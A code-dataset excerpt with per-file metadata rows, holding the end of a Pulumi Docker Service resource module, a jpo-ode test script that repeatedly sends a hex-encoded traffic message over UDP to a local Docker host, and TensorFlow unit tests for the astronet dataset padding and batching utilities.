* `prefs` (`pulumi.Input[list]`)
* `resources` (`pulumi.Input[dict]`)
* `limits` (`pulumi.Input[dict]`)
* `genericResources` (`pulumi.Input[dict]`)
* `discreteResourcesSpecs` (`pulumi.Input[list]`)
* `namedResourcesSpecs` (`pulumi.Input[list]`)
* `memoryBytes` (`pulumi.Input[float]`)
* `nanoCpus` (`pulumi.Input[float]`)
* `reservation` (`pulumi.Input[dict]`)
* `genericResources` (`pulumi.Input[dict]`)
* `discreteResourcesSpecs` (`pulumi.Input[list]`)
* `namedResourcesSpecs` (`pulumi.Input[list]`)
* `memoryBytes` (`pulumi.Input[float]`)
* `nanoCpus` (`pulumi.Input[float]`)
* `restartPolicy` (`pulumi.Input[dict]`)
* `condition` (`pulumi.Input[str]`)
* `delay` (`pulumi.Input[str]`)
* `maxAttempts` (`pulumi.Input[float]`)
* `window` (`pulumi.Input[str]`)
* `runtime` (`pulumi.Input[str]`)
The **update_config** object supports the following:
* `delay` (`pulumi.Input[str]`)
* `failureAction` (`pulumi.Input[str]`)
* `maxFailureRatio` (`pulumi.Input[str]`)
* `monitor` (`pulumi.Input[str]`)
* `order` (`pulumi.Input[str]`)
* `parallelism` (`pulumi.Input[float]`)
> This content is derived from https://github.com/terraform-providers/terraform-provider-docker/blob/master/website/docs/r/service.html.markdown.
"""
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = dict()
        __props__["auth"] = auth
        __props__["converge_config"] = converge_config
        __props__["endpoint_spec"] = endpoint_spec
        __props__["labels"] = labels
        __props__["mode"] = mode
        __props__["name"] = name
        __props__["rollback_config"] = rollback_config
        __props__["task_spec"] = task_spec
        __props__["update_config"] = update_config
        return Service(resource_name, opts=opts, __props__=__props__)

    def translate_output_property(self, prop):
        return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop

    def translate_input_property(self, prop):
        return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
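# --- Example (editor's sketch) ---------------------------------------------
# A minimal, hedged usage sketch for the Service resource documented above.
# Assumptions: pulumi and pulumi_docker are installed, the configured Docker
# host is a swarm manager, and the image and replica count are illustrative
# only (not taken from the source).
import pulumi
import pulumi_docker as docker

web = docker.Service(
    "web",
    task_spec={
        "containerSpec": {
            "image": "nginx:1.21",  # illustrative image, not from the source
        },
    },
    mode={"replicated": {"replicas": 2}},
)

pulumi.export("service_name", web.name)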
| 41.834586
| 245
| 0.539073
| 2,779
| 27,820
| 5.303706
| 0.105074
| 0.18658
| 0.106384
| 0.018997
| 0.844359
| 0.820408
| 0.815252
| 0.811792
| 0.799647
| 0.799647
| 0
| 0.000052
| 0.313336
| 27,820
| 664
| 246
| 41.89759
| 0.771502
| 0.559022
| 0
| 0.029851
| 1
| 0
| 0.144954
| 0.008386
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059701
| false
| 0.014925
| 0.089552
| 0.029851
| 0.343284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 867bc781598ec6bd6d3ca0995c2d287290060113
| 2,364
| py
| Python
| scripts/tests/udpsender_map.py
| dmccoystephenson/jpo-ode
| 55ece72360c60e68d4d82f4561ab6fd1669c9469
| ["Apache-2.0"] | 75
| 2016-11-24T12:59:43.000Z
| 2021-11-30T09:09:57.000Z
| scripts/tests/udpsender_map.py
| dmccoystephenson/jpo-ode
| 55ece72360c60e68d4d82f4561ab6fd1669c9469
| ["Apache-2.0"] | 179
| 2016-11-22T21:18:45.000Z
| 2022-03-16T20:02:13.000Z
| scripts/tests/udpsender_map.py
| dmccoystephenson/jpo-ode
| 55ece72360c60e68d4d82f4561ab6fd1669c9469
| ["Apache-2.0"] | 43
| 2016-11-28T11:37:07.000Z
| 2022-01-17T05:14:30.000Z
|
import socket
import time
import os
# Currently set to oim-dev environment's ODE
UDP_IP = os.getenv('DOCKER_HOST_IP')
UDP_PORT = 44920
MESSAGE = "001283c138003000205e9c014d3eab092ca624b5518202dc3658042800000400023622c60ca009f66d48abfaf81388d8ad18070027d9b2ffcfe9804f13667b1ffd009ec2c76e3ffc82c4e0001004b00c5000000800066c4574101813ecd8b757fae027d9b30e6ff5604ec363561fe7809ec6cd69bfec813c4d8a617fc9027d9b2147008604fb163666000016250000802580228000001000096229e1309b51a6fe4204dd361cf1fe5009f6018e1000096020a00000080004d88a57f84027d9b3827002804ec36087600a009f62c289407282c310001c0440188800000006c46dbe02813ec5816d800710052200000001b11b6fad404fb16054a0000401c8800000006c47b3d24813ec5816d801b100c4200000000af890f12c580007e87100d4200000008af4c0f12c580077e7a2c0004000160002001cb028d000000800052c160bc40b5fffd8a9409d86bfebb5b40141457fef53b76c008b467014145800080002bffcbffc82c6a0001804b024d000000800036c2213c3b013ecd80096d64027d9affd8cdfc04f635ff7983bc09f66c0082aa2014280b1b80006012c0b3400000100004b02bcf0f6d7fe065d602788b0138eb900b1240001012c083400000080009b0c2af0b804fb15fe6de171afff6c63e04ec15fe1de670060e40002581ea8000004000135da6df0180a0a6adc2c00d0143cd51897fda028c8abb25001a0b0680008012c105400000200009aedbefae005053540ee003c0a326a9cf3fed8143c5667780010582c0004009608aa00000080004d76de7ee402829aba88ffdc050f354525fff80a322bcf23fa602c690000c04b0395000000200016bb4fbd4e01414d3215800802940ab108fff2030d2000110126200000001aee5103be050a15f6f1ffc8404d8800000006bb97c18e0142857dfa800010146200000001aee89099a050a15f8720000b05dd000000800046be3743b781428d80e1b00002879b00514b4404f63600827d8c09e22c000400015ffe6007016190000402582ce8000004000135ecee1de80a146c02e54758143cd8059ad3e027b1b00613dd004f102c360000804b055d000000200046bcc7c3c781428d80108c6e02829b002b2ece050a16019a4b29b00ab5c3604f136004e410409ec018a10000960c3a00000080004d7de9878602851b003923cc05053601623b440a0a6bfb8c3a5014140b0640005012c197400000100005afe570ef2050a36003a47c80a0a6bfd2c45f014140b054000501101a8200000001b05a90edc050535ffe605800a0a101b8200000001b08a30ec0050535ffe605300a0a101c8200000005b0c6f0ea4050515ffca0568b0001000e"
print("UDP target IP:", UDP_IP)
print("UDP target port:", UDP_PORT)
#print("message:", MESSAGE)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # UDP
while True:
    time.sleep(5)
    print("sending SRM every 5 seconds")
    sock.sendto(bytes.fromhex(MESSAGE), (UDP_IP, UDP_PORT))
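# --- Example (editor's sketch) ---------------------------------------------
# A matching receiver for testing the sender above locally. Assumptions: this
# is not part of the ODE itself, and UDP port 44920 is free on the listening
# host.
import socket

recv_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
recv_sock.bind(("0.0.0.0", 44920))
print("listening on UDP port 44920")
while True:
    data, addr = recv_sock.recvfrom(4096)  # one datagram per message
    print(f"received {len(data)} bytes from {addr}")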
| 118.2
| 1,942
| 0.950508
| 71
| 2,364
| 31.507042
| 0.535211
| 0.006705
| 0.008046
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.625597
| 0.024958
| 2,364
| 19
| 1,943
| 124.421053
| 0.344902
| 0.030457
| 0
| 0
| 0
| 0
| 0.874126
| 0.843531
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.230769
| 0
| 0.230769
| 0.230769
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 8682f25cbad8884b6ac4fe428eda85f808bd1a3f
| 26,419
| py
| Python
| research/astronet/astronet/ops/dataset_ops_test.py
| jdavidagudelo/tensorflow-models
| 6f019beec73b01861363bf717706e27f4210b979
| ["Apache-2.0"] | 1
| 2021-05-17T01:42:29.000Z
| 2021-05-17T01:42:29.000Z
| research/astronet/astronet/ops/dataset_ops_test.py
| jdavidagudelo/tensorflow-models
| 6f019beec73b01861363bf717706e27f4210b979
| ["Apache-2.0"] | null | null | null
| research/astronet/astronet/ops/dataset_ops_test.py
| jdavidagudelo/tensorflow-models
| 6f019beec73b01861363bf717706e27f4210b979
| ["Apache-2.0"] | null | null | null
|
# Copyright 2018 The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for dataset_ops.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import flags
import numpy as np
import tensorflow as tf
from research.astronet.astronet.ops import dataset_ops
from research.astronet.astronet.util import configdict
FLAGS = flags.FLAGS
flags.DEFINE_string("test_srcdir", "", "Test source directory.")
_TEST_TFRECORD_FILE = "test_data/test_dataset.tfrecord"
class DatasetOpsTest(tf.test.TestCase):
def testPadTensorToBatchSize(self):
with self.test_session():
# Cannot pad a 0-dimensional Tensor.
tensor_0d = tf.constant(1)
with self.assertRaises(ValueError):
dataset_ops.pad_tensor_to_batch_size(tensor_0d, 10)
# 1-dimensional Tensor. Un-padded batch size is 5.
tensor_1d = tf.range(5, dtype=tf.int32)
self.assertEqual([5], tensor_1d.shape)
self.assertAllEqual([0, 1, 2, 3, 4], tensor_1d.eval())
# Invalid to pad Tensor with batch size 5 to batch size 3.
tensor_1d_pad3 = dataset_ops.pad_tensor_to_batch_size(tensor_1d, 3)
with self.assertRaises(tf.errors.InvalidArgumentError):
tensor_1d_pad3.eval()
tensor_1d_pad5 = dataset_ops.pad_tensor_to_batch_size(tensor_1d, 5)
self.assertEqual([5], tensor_1d_pad5.shape)
self.assertAllEqual([0, 1, 2, 3, 4], tensor_1d_pad5.eval())
tensor_1d_pad8 = dataset_ops.pad_tensor_to_batch_size(tensor_1d, 8)
self.assertEqual([8], tensor_1d_pad8.shape)
self.assertAllEqual([0, 1, 2, 3, 4, 0, 0, 0], tensor_1d_pad8.eval())
# 2-dimensional Tensor. Un-padded batch size is 3.
tensor_2d = tf.reshape(tf.range(9, dtype=tf.int32), [3, 3])
self.assertEqual([3, 3], tensor_2d.shape)
self.assertAllEqual([[0, 1, 2], [3, 4, 5], [6, 7, 8]], tensor_2d.eval())
tensor_2d_pad2 = dataset_ops.pad_tensor_to_batch_size(tensor_2d, 2)
      # Invalid to pad Tensor with batch size 3 to batch size 2.
with self.assertRaises(tf.errors.InvalidArgumentError):
tensor_2d_pad2.eval()
tensor_2d_pad3 = dataset_ops.pad_tensor_to_batch_size(tensor_2d, 3)
self.assertEqual([3, 3], tensor_2d_pad3.shape)
self.assertAllEqual([[0, 1, 2], [3, 4, 5], [6, 7, 8]],
tensor_2d_pad3.eval())
tensor_2d_pad4 = dataset_ops.pad_tensor_to_batch_size(tensor_2d, 4)
self.assertEqual([4, 3], tensor_2d_pad4.shape)
self.assertAllEqual([[0, 1, 2], [3, 4, 5], [6, 7, 8], [0, 0, 0]],
tensor_2d_pad4.eval())
def testPadDatasetToBatchSizeNoWeights(self):
values = {"labels": np.arange(10, dtype=np.int32)}
dataset = tf.data.Dataset.from_tensor_slices(values).batch(4)
self.assertItemsEqual(["labels"], dataset.output_shapes.keys())
self.assertFalse(dataset.output_shapes["labels"].is_fully_defined())
dataset_pad = dataset_ops.pad_dataset_to_batch_size(dataset, 4)
self.assertItemsEqual(["labels", "weights"],
dataset_pad.output_shapes.keys())
self.assertEqual([4], dataset_pad.output_shapes["labels"])
self.assertEqual([4], dataset_pad.output_shapes["weights"])
next_batch = dataset_pad.make_one_shot_iterator().get_next()
next_labels = next_batch["labels"]
next_weights = next_batch["weights"]
with self.test_session() as sess:
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([0, 1, 2, 3], labels)
self.assertAllClose([1, 1, 1, 1], weights)
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([4, 5, 6, 7], labels)
self.assertAllClose([1, 1, 1, 1], weights)
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([8, 9, 0, 0], labels)
self.assertAllClose([1, 1, 0, 0], weights)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([next_labels, next_weights])
def testPadDatasetToBatchSizeWithWeights(self):
values = {
"labels": np.arange(10, dtype=np.int32),
"weights": 100 + np.arange(10, dtype=np.int32)
}
dataset = tf.data.Dataset.from_tensor_slices(values).batch(4)
self.assertItemsEqual(["labels", "weights"], dataset.output_shapes.keys())
self.assertFalse(dataset.output_shapes["labels"].is_fully_defined())
self.assertFalse(dataset.output_shapes["weights"].is_fully_defined())
dataset_pad = dataset_ops.pad_dataset_to_batch_size(dataset, 4)
self.assertItemsEqual(["labels", "weights"],
dataset_pad.output_shapes.keys())
self.assertEqual([4], dataset_pad.output_shapes["labels"])
self.assertEqual([4], dataset_pad.output_shapes["weights"])
next_batch = dataset_pad.make_one_shot_iterator().get_next()
next_labels = next_batch["labels"]
next_weights = next_batch["weights"]
with self.test_session() as sess:
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([0, 1, 2, 3], labels)
self.assertAllEqual([100, 101, 102, 103], weights)
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([4, 5, 6, 7], labels)
self.assertAllEqual([104, 105, 106, 107], weights)
labels, weights = sess.run([next_labels, next_weights])
self.assertAllEqual([8, 9, 0, 0], labels)
self.assertAllEqual([108, 109, 0, 0], weights)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run([next_labels, next_weights])
def testSetBatchSizeSingleTensor1d(self):
dataset = tf.data.Dataset.range(4).batch(2)
self.assertFalse(dataset.output_shapes.is_fully_defined())
dataset = dataset_ops.set_batch_size(dataset, 2)
self.assertEqual([2], dataset.output_shapes)
next_batch = dataset.make_one_shot_iterator().get_next()
with self.test_session() as sess:
batch_value = sess.run(next_batch)
self.assertAllEqual([0, 1], batch_value)
batch_value = sess.run(next_batch)
self.assertAllEqual([2, 3], batch_value)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(next_batch)
def testSetBatchSizeSingleTensor2d(self):
values = np.arange(12, dtype=np.int32).reshape([4, 3])
dataset = tf.data.Dataset.from_tensor_slices(values).batch(2)
self.assertFalse(dataset.output_shapes.is_fully_defined())
dataset = dataset_ops.set_batch_size(dataset, 2)
self.assertEqual([2, 3], dataset.output_shapes)
next_batch = dataset.make_one_shot_iterator().get_next()
with self.test_session() as sess:
batch_value = sess.run(next_batch)
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], batch_value)
batch_value = sess.run(next_batch)
self.assertAllEqual([[6, 7, 8], [9, 10, 11]], batch_value)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(next_batch)
def testSetBatchSizeNested(self):
values = {
"a": 100 + np.arange(4, dtype=np.int32),
"nest": {
"b": np.arange(12, dtype=np.int32).reshape([4, 3]),
"c": np.arange(4, dtype=np.int32)
}
}
dataset = tf.data.Dataset.from_tensor_slices(values).batch(2)
self.assertItemsEqual(["a", "nest"], dataset.output_shapes.keys())
self.assertItemsEqual(["b", "c"], dataset.output_shapes["nest"].keys())
self.assertFalse(dataset.output_shapes["a"].is_fully_defined())
self.assertFalse(dataset.output_shapes["nest"]["b"].is_fully_defined())
self.assertFalse(dataset.output_shapes["nest"]["c"].is_fully_defined())
dataset = dataset_ops.set_batch_size(dataset, 2)
self.assertItemsEqual(["a", "nest"], dataset.output_shapes.keys())
self.assertItemsEqual(["b", "c"], dataset.output_shapes["nest"].keys())
self.assertEqual([2], dataset.output_shapes["a"])
self.assertEqual([2, 3], dataset.output_shapes["nest"]["b"])
self.assertEqual([2], dataset.output_shapes["nest"]["c"])
next_batch = dataset.make_one_shot_iterator().get_next()
next_a = next_batch["a"]
next_b = next_batch["nest"]["b"]
next_c = next_batch["nest"]["c"]
with self.test_session() as sess:
a, b, c = sess.run([next_a, next_b, next_c])
self.assertAllEqual([100, 101], a)
self.assertAllEqual([[0, 1, 2], [3, 4, 5]], b)
self.assertAllEqual([0, 1], c)
a, b, c = sess.run([next_a, next_b, next_c])
self.assertAllEqual([102, 103], a)
self.assertAllEqual([[6, 7, 8], [9, 10, 11]], b)
self.assertAllEqual([2, 3], c)
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(next_batch)
class BuildDatasetTest(tf.test.TestCase):
def setUp(self):
super(BuildDatasetTest, self).setUp()
# The test dataset contains 10 tensorflow.Example protocol buffers. The i-th
# Example contains the following features:
# global_view = [0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 6.0, 7.0]
# local_view = [0.0, 1.0, 2.0, 3.0]
# aux_feature = 100 + i
# label_str = "PC" if i % 3 == 0 else "AFP" if i % 3 == 1 else "NTP"
self._file_pattern = _TEST_TFRECORD_FILE
self._input_config = configdict.ConfigDict({
"features": {
"global_view": {
"is_time_series": True,
"length": 8
},
"local_view": {
"is_time_series": True,
"length": 4
},
"aux_feature": {
"is_time_series": False,
"length": 1
}
}
})
def testNonExistentFileRaisesValueError(self):
with self.assertRaises(ValueError):
dataset_ops.build_dataset(
file_pattern="nonexistent",
input_config=self._input_config,
batch_size=4)
def testBuildWithoutLabels(self):
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4,
include_labels=False)
# We can use a one-shot iterator without labels because we don't have the
# stateful hash map for label ids.
iterator = dataset.make_one_shot_iterator()
features = iterator.get_next()
# Expect features only.
self.assertItemsEqual(["time_series_features", "aux_features"],
features.keys())
with self.test_session() as sess:
# Batch 1.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[100], [101], [102], [103]],
f["aux_features"]["aux_feature"])
# Batch 2.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[104], [105], [106], [107]],
f["aux_features"]["aux_feature"])
# Batch 3.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[108], [109]],
f["aux_features"]["aux_feature"])
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(features)
def testLabels1(self):
self._input_config["label_feature"] = "label_str"
self._input_config["label_map"] = {"PC": 0, "AFP": 1, "NTP": 2}
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4)
# We need an initializable iterator when using labels because of the
# stateful label id hash table.
iterator = dataset.make_initializable_iterator()
inputs = iterator.get_next()
init_op = tf.tables_initializer()
# Expect features and labels.
self.assertItemsEqual(["time_series_features", "aux_features", "labels"],
inputs.keys())
labels = inputs["labels"]
with self.test_session() as sess:
sess.run([init_op, iterator.initializer])
# Fetch 3 batches.
np.testing.assert_array_equal([0, 1, 2, 0], sess.run(labels))
np.testing.assert_array_equal([1, 2, 0, 1], sess.run(labels))
np.testing.assert_array_equal([2, 0], sess.run(labels))
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(labels)
def testLabels2(self):
self._input_config["label_feature"] = "label_str"
self._input_config["label_map"] = {"PC": 1, "AFP": 0, "NTP": 0}
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4)
# We need an initializable iterator when using labels because of the
# stateful label id hash table.
iterator = dataset.make_initializable_iterator()
inputs = iterator.get_next()
init_op = tf.tables_initializer()
# Expect features and labels.
self.assertItemsEqual(["time_series_features", "aux_features", "labels"],
inputs.keys())
labels = inputs["labels"]
with self.test_session() as sess:
sess.run([init_op, iterator.initializer])
# Fetch 3 batches.
np.testing.assert_array_equal([1, 0, 0, 1], sess.run(labels))
np.testing.assert_array_equal([0, 0, 1, 0], sess.run(labels))
np.testing.assert_array_equal([0, 1], sess.run(labels))
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(labels)
def testBadLabelIdsRaisesValueError(self):
self._input_config["label_feature"] = "label_str"
# Label ids should be contiguous integers starting at 0.
self._input_config["label_map"] = {"PC": 1, "AFP": 2, "NTP": 3}
with self.assertRaises(ValueError):
dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4)
def testUnknownLabel(self):
self._input_config["label_feature"] = "label_str"
# label_map does not include "NTP".
self._input_config["label_map"] = {"PC": 1, "AFP": 0}
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4)
# We need an initializable iterator when using labels because of the
# stateful label id hash table.
iterator = dataset.make_initializable_iterator()
inputs = iterator.get_next()
init_op = tf.tables_initializer()
# Expect features and labels.
self.assertItemsEqual(["time_series_features", "aux_features", "labels"],
inputs.keys())
labels = inputs["labels"]
with self.test_session() as sess:
sess.run([init_op, iterator.initializer])
# Unknown label "NTP".
with self.assertRaises(tf.errors.InvalidArgumentError):
sess.run(labels)
def testReverseTimeSeries(self):
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4,
reverse_time_series_prob=1,
include_labels=False)
# We can use a one-shot iterator without labels because we don't have the
# stateful hash map for label ids.
iterator = dataset.make_one_shot_iterator()
features = iterator.get_next()
# Expect features only.
self.assertItemsEqual(["time_series_features", "aux_features"],
features.keys())
with self.test_session() as sess:
# Batch 1.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[3, 2, 1, 0],
[3, 2, 1, 0],
[3, 2, 1, 0],
[3, 2, 1, 0],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[100], [101], [102], [103]],
f["aux_features"]["aux_feature"])
# Batch 2.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[3, 2, 1, 0],
[3, 2, 1, 0],
[3, 2, 1, 0],
[3, 2, 1, 0],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[104], [105], [106], [107]],
f["aux_features"]["aux_feature"])
# Batch 3.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[7, 6, 5, 4, 3, 2, 1, 0],
[7, 6, 5, 4, 3, 2, 1, 0],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[3, 2, 1, 0],
[3, 2, 1, 0],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[108], [109]],
f["aux_features"]["aux_feature"])
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(features)
def testRepeat(self):
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4,
include_labels=False)
# We can use a one-shot iterator without labels because we don't have the
# stateful hash map for label ids.
iterator = dataset.make_one_shot_iterator()
features = iterator.get_next()
# Expect features only.
self.assertItemsEqual(["time_series_features", "aux_features"],
features.keys())
with self.test_session() as sess:
# Batch 1.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[100], [101], [102], [103]],
f["aux_features"]["aux_feature"])
# Batch 2.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[104], [105], [106], [107]],
f["aux_features"]["aux_feature"])
# Batch 3.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[108], [109]],
f["aux_features"]["aux_feature"])
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(features)
def testTPU(self):
dataset = dataset_ops.build_dataset(
file_pattern=self._file_pattern,
input_config=self._input_config,
batch_size=4,
include_labels=False)
# We can use a one-shot iterator without labels because we don't have the
# stateful hash map for label ids.
iterator = dataset.make_one_shot_iterator()
features = iterator.get_next()
# Expect features only.
self.assertItemsEqual(["time_series_features", "aux_features"],
features.keys())
with self.test_session() as sess:
# Batch 1.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[100], [101], [102], [103]],
f["aux_features"]["aux_feature"])
# Batch 2.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[104], [105], [106], [107]],
f["aux_features"]["aux_feature"])
# Batch 3.
f = sess.run(features)
np.testing.assert_array_almost_equal([
[0, 1, 2, 3, 4, 5, 6, 7],
[0, 1, 2, 3, 4, 5, 6, 7],
], f["time_series_features"]["global_view"])
np.testing.assert_array_almost_equal([
[0, 1, 2, 3],
[0, 1, 2, 3],
], f["time_series_features"]["local_view"])
np.testing.assert_array_almost_equal([[108], [109]],
f["aux_features"]["aux_feature"])
# No more batches.
with self.assertRaises(tf.errors.OutOfRangeError):
sess.run(features)
if __name__ == "__main__":
tf.test.main()
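# --- Example (editor's sketch) ---------------------------------------------
# A minimal NumPy sketch of the padding semantics the tests above exercise.
# Assumption: this mirrors, but is not, the real
# dataset_ops.pad_tensor_to_batch_size, which operates on tf.Tensors.
import numpy as np

def pad_batch(array, batch_size):
    """Zero-pad the leading (batch) dimension of `array` up to `batch_size`."""
    if array.ndim == 0:
        raise ValueError("Cannot pad a 0-dimensional array.")
    if array.shape[0] > batch_size:
        raise ValueError("Batch is already larger than the target batch size.")
    pad_rows = batch_size - array.shape[0]
    padding = [(0, pad_rows)] + [(0, 0)] * (array.ndim - 1)
    return np.pad(array, padding, mode="constant")

print(pad_batch(np.arange(5), 8))  # -> [0 1 2 3 4 0 0 0]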
| 40.833076
| 84
| 0.542526
| 3,228
| 26,419
| 4.228005
| 0.083024
| 0.011577
| 0.015607
| 0.020516
| 0.826788
| 0.820999
| 0.799751
| 0.774985
| 0.761137
| 0.705012
| 0
| 0.056608
| 0.326659
| 26,419
| 646
| 85
| 40.896285
| 0.710608
| 0.089822
| 0
| 0.731343
| 0
| 0
| 0.075126
| 0.001293
| 0
| 0
| 0
| 0
| 0.266525
| 1
| 0.034115
| false
| 0
| 0.017058
| 0
| 0.055437
| 0.002132
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
